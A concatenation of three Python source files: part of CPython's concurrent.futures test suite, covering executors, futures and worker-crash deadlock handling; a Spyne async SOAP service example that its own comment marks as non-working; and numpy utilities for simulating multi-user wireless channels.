self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertRaises(TypeError):
self.executor.submit(fn=capture, arg=1)
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
test.support.reap_children()
# cleanup multiprocessing
multiprocessing.process._cleanup()
# Stop the ForkServer process if it's running
from multiprocessing import forkserver
forkserver._forkserver._stop()
# bpo-37421: Explicitly call _run_finalizers() to remove immediately
# temporary directories created by multiprocessing.util.get_temp_dir().
multiprocessing.util._run_finalizers()
test.support.gc_collect()
if __name__ == "__main__":
unittest.main()
|
async.py
|
#!/usr/bin/env python
# encoding: utf8
#
# Copyright © Burak Arslan <burak at arskom dot com dot tr>,
# Arskom Ltd. http://www.arskom.com.tr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the owner nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# FIXME: This example is not working. It's here just so we don't forget about
# it. Please ignore this.
#
import time
from threading import Thread
import logging
from spyne.application import Application
from spyne.decorator import rpc
from spyne.decorator import srpc
from spyne.interface.wsdl import Wsdl11
from spyne.protocol.soap import Soap11
from spyne.service import ServiceBase
from spyne.model.primitive import String
from spyne.model.primitive import Integer
from spyne.util import get_callback_info
from spyne.server.wsgi import WsgiApplication
'''
This is a very simple async service that sleeps for a specified
number of seconds and then call back the caller with a message.
This kicks off a new Thread for each request, which is not recommended
for a real-world application. Spyne does not provide any thread
management or scheduling mechanism, the service is responsible for the
execution of the async process.
'''
class SleepingService(ServiceBase):
@rpc(Integer, _is_async=True)
def sleep(self, seconds):
msgid, replyto = get_callback_info()
def run():
time.sleep(seconds)
client = make_service_client(replyto, self)
client.woke_up('good morning', msgid=msgid)
Thread(target=run).start()
@srpc(String, _is_callback=True)
def woke_up(message):
pass
if __name__=='__main__':
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)
try:
from wsgiref.simple_server import make_server
except ImportError:
logger.error("Error: example server code requires Python >= 2.5")
application = Application([SleepingService], 'spyne.examples.async',
interface=Wsdl11(), in_protocol=Soap11(), out_protocol=Soap11())
server = make_server('127.0.0.1', 7789, WsgiApplication(application))
logging.info("listening to http://127.0.0.1:7789")
logging.info("wsdl is at: http://localhost:7789/?wsdl")
server.serve_forever()
|
raputil.py
|
#!/usr/bin/python
from __future__ import division
import numpy as np
import math
import os
import time
import numpy.linalg as la
from tools.tfinterp import interp1d_
sqrt=np.sqrt
pi = math.pi
def hexagonal_uniform(N,as_complex=False):
'returns uniformly distributed points of shape=(2,N) within a hexagon whose minimum radius is 1.0'
phi = 2*pi/6 *.5
S = np.array( [[1,1],np.tan([phi,-phi])] ) # vectors to vertices of next hexagon ( centered at (2,0) )a
# uniformly sample the parallelogram defined by the columns of S
v = np.matmul(S,np.random.uniform(0,1,(2,N)))
v[0] = 1 - abs(v[0]-1) # fold back to make a triangle
c = (v[0] + 1j*v[1]) * np.exp( 2j*pi/6*np.floor( np.random.uniform(0,6,N) ) ) # rotate to a random sextant
if as_complex:
return c
else:
return np.array( (c.real,c.imag) )
def left_least_squares(x,y,rcond=-1,fast=False):
'find the A that best fits y-A*x'
if fast:
return la.lstsq( np.matmul(x,x.T) ,np.matmul(x,y.T) ,rcond=rcond )[0].T # faster, but less stable
else:
return la.lstsq( x.T,y.T,rcond=rcond)[0].T
def rms(x,axis=None):
'calculate the root-mean-square of a signal, if axis!=None, then reduction will only be along the given axis/axes'
if np.iscomplexobj(x):
x=abs(x)
return np.sqrt(np.mean(np.square(x),axis) )
def nlfunc(r,sc,grid,gg,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g = r * np.interp(r/sc,grid,gg)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr = sc * (grid[1]-grid[0]) * 1e-3
dgdr = (nlfunc(r+.5*dr,sc,grid,gg,False) - nlfunc(r-.5*dr,sc,grid,gg,False)) / dr
return (g,dgdr)
else:
return g
def nlfunc_(r_,sc_,grid,gg_,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g_ = r_ * interp1d_(r_/sc_,grid,gg_)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr_ = sc_ * (grid[1]-grid[0]) * 1e-3
dgdr_ = (nlfunc_(r_+.5*dr_,sc_,grid,gg_,False) - nlfunc_(r_-.5*dr_,sc_,grid,gg_,False)) / dr_
return (g_,dgdr_)
else:
return g_
def crandn(shape,set_mag=None):
'circular symmetric Gaussian with variance 2 (real,imag each being var=1) '
X= np.random.normal( size=tuple(shape)+(2,)).view(np.complex128)[...,0]
if set_mag is not None:
X = X *set_mag / abs(X)
return X
def random_qpsk( *shape):
return ((np.random.uniform( -1,1,size=shape+(2,) ) > 0)*2-1).astype(np.float32).view(np.complex64)[...,0]
class Problem(object):
@staticmethod
def scenario1():
return dict(Nr=1,C=1,Nu=512,Ns=64,beta=.01,SNR_dB=10.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
@staticmethod
def scenario2():
return dict(Nr=64,C=7,Nu=64,Ns=64,beta=1,SNR_dB=20.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
def __init__(self, Nr=64, C=7, Nu=64, Ns=64, beta=.01,L=5,ang=10,rice_k_dB=10,ple=4,SNR_dB=10.0,ambig=False,scramble=False,S=None,cpx=False,mmv2d=False,normS=None):
"""
Nr : number of Rx antennas
C : number of cells (>1 indicates there are "far" users)
Nu : max # users per cell
Ns : spreading code length
beta : user load (i.e.,expected active / total user ratio)
L : paths per cluster
ang : angular spread within cluster (in degrees)
rice_k_dB : rice k parameter in dB
ple : path-loss exponent: gain = 1/(1+d^ple) for distance d
S : set of spreading codes, shape=(Ns,C*Nu) """
if S is None:
S = random_qpsk(Ns,C*Nu)
self.Nr = Nr
self.C = C
self.Nu = Nu
self.Ns = Ns
self.beta = beta
self.L = L
self.ang = ang
self.rice_k_dB = rice_k_dB
self.ple = ple
self.SNR_dB = SNR_dB
self.ambig = ambig
self.scramble = scramble
self.cpx = cpx
self.mmv2d = mmv2d
if self.cpx == np.iscomplexobj(S):
self.S = S
else:
if not self.cpx:
top = np.concatenate( (S.real, -S.imag),axis=1 )
btm = np.concatenate( (S.imag, S.real),axis=1 )
self.S = np.concatenate( (top,btm),axis=0 )
else:
assert False,'WHY!?'
if self.cpx:
assert self.S.shape == (Ns,C*Nu)
else:
assert self.S.shape == (2*Ns,2*C*Nu)
if normS is not None:
dnorm = np.asarray(normS) / np.sqrt( np.square(self.S).sum(axis=0) )
self.S = self.S * dnorm
self.timegen = 0 # time spent waiting for generation of YX (does NOT count subprocess cpus time if nsubprocs>0
def genX(self,batches=1):
"""generate one or more batches(i.e. random draws) of active users with Ricean channels
batches : number of independent realizations to generate
If cpx, the returned X has shape (batches,C*Nu,Nr),
otherwise (batches,2*C*Nu,Nr)
"""
Nr,C,Nu,Ns,S = self.Nr,self.C,self.Nu,self.Ns,self.S
L,ang,rice_k_dB,ple = self.L,self.ang,self.rice_k_dB,self.ple
X = np.zeros((batches,C,Nu,Nr),dtype=np.complex64)
for i in range(batches):
for c in range(C): #c==0 indicates all users are in the base stations' cell ("near")
###################################
# choose how many and which users are active in this cell
K = np.random.binomial(Nu,self.beta) # number of active users in this cell E[K] = Nu*beta
active_users = np.random.permutation(Nu)[:K]
#NOTE: Tensors below have shape (user,path,angle), until Z when we sum the path dimension.
# how far (weak) is each user?
if c==0:
dist = abs( hexagonal_uniform( K ,as_complex=True) )
elif 0<c<7:
dist = abs( 2+hexagonal_uniform( K ,as_complex=True) )
else:
assert False,'assuming 1 or 7 hexagonal cells'
dist.shape = (K,1,1)
gain = 1/(1+dist**ple)
# The L paths per user impinge on our linear array with clustered angles theta.
# All paths per user start at theta0 and are uniformly distributed in the next `ang` degrees.
# (theta units=radians,zero means broadside to the linear array)
theta0 = np.random.uniform(0,2*pi,(K,1,1))
theta = np.mod( theta0 + np.random.uniform(0,ang*pi/180,(K,L,1)) ,2*pi)
# different Ricean gains for each of the paths
direct_path = crandn((K,1,1),set_mag=1.0) # one dominant path component
other_paths = 10**(-rice_k_dB/20)*sqrt(.5)*crandn((K,L,1))
# each of the different paths impinges onto our linear array according to the array spacing and theta
E = gain*(direct_path + other_paths) * np.exp(1j* theta * np.arange(Nr) )
# sum the different paths, Z.shape is (user,angle)
Z = E.sum(axis=1)
if np.isnan(Z).any():
raise RuntimeError()
# update the data set for these users' signal
X[i,c,active_users] = np.fft.fft(Z,Nr,axis=-1)/Nr
###################################
# collapse the C and Nu dimensions into one
X.shape = (batches,C*Nu,Nr)
if self.ambig:
X = X[:,np.random.permutation(C*Nu),:]
if not self.cpx:
X2 = np.empty( (batches,2*C*Nu,Nr),np.float32)
X2[:,:C*Nu,:] = X.real
X2[:,C*Nu:,:] = X.imag
X = X2
if self.scramble:
shp = X.shape
X = np.random.permutation(X.ravel())
X.shape = shp
if self.mmv2d:
# the "sample vector" dimension should remain in second-to-last dimension
N = X.shape[-2]
X = np.reshape( np.transpose(X,(1,0,2)) ,(N,-1) )
return X
def fwd(self,X):
'forward linear operator'
assert np.iscomplexobj(X) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S)
def adj(self,X):
'adjoint linear operator'
assert np.iscomplexobj(Y) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S.T.conj())
def add_noise(self,Y0):
'add noise at the given SNR, returns Y0+W,wvar'
wvar = (la.norm(Y0)**2/Y0.size) * 10**(-self.SNR_dB/10)
if self.cpx:
Y =(Y0 + crandn(Y0.shape) * sqrt(wvar/2)).astype(np.complex64,copy=False)
else:
Y = (Y0 + np.random.normal(scale=sqrt(wvar),size=Y0.shape) ).astype(np.float32,copy=False)
return Y,wvar
def genYX(self,batches=1,nsubprocs=None):
t0 = time.time()
if nsubprocs is None:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
else:
if not hasattr(self,'qgen'):
import multiprocessing as mp
self.qgen = mp.Queue(maxsize=nsubprocs) # one slot per subprocess
def makesets():
np.random.seed() #MUST reseed or every subprocess will generate the same data
while True:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
self.qgen.put((Y,X),block=True)
self.subprocs = []
for i in range(nsubprocs):
prc = mp.Process(target=makesets)
prc.daemon=True
prc.start()
self.subprocs.append(prc)
Y,X = self.qgen.get(True)
et = time.time() - t0
self.timegen += et
return (Y,X)
def kill_subprocs(self):
if hasattr(self,'qgen') and hasattr(self,'subprocs'):
for prc in self.subprocs:
prc.terminate()
prc.join()
del self.qgen
del self.subprocs
if __name__ == '__main__':
import unittest
class RapTest(unittest.TestCase):
def _test_awgn(self,cpx):
snr = np.random.uniform(3,20)
p = Problem(cpx=cpx,SNR_dB=snr)
X = p.genX(5)
self.assertEqual( np.iscomplexobj(X) , cpx )
Y0 = p.fwd(X)
self.assertEqual( np.iscomplexobj(Y0) , cpx )
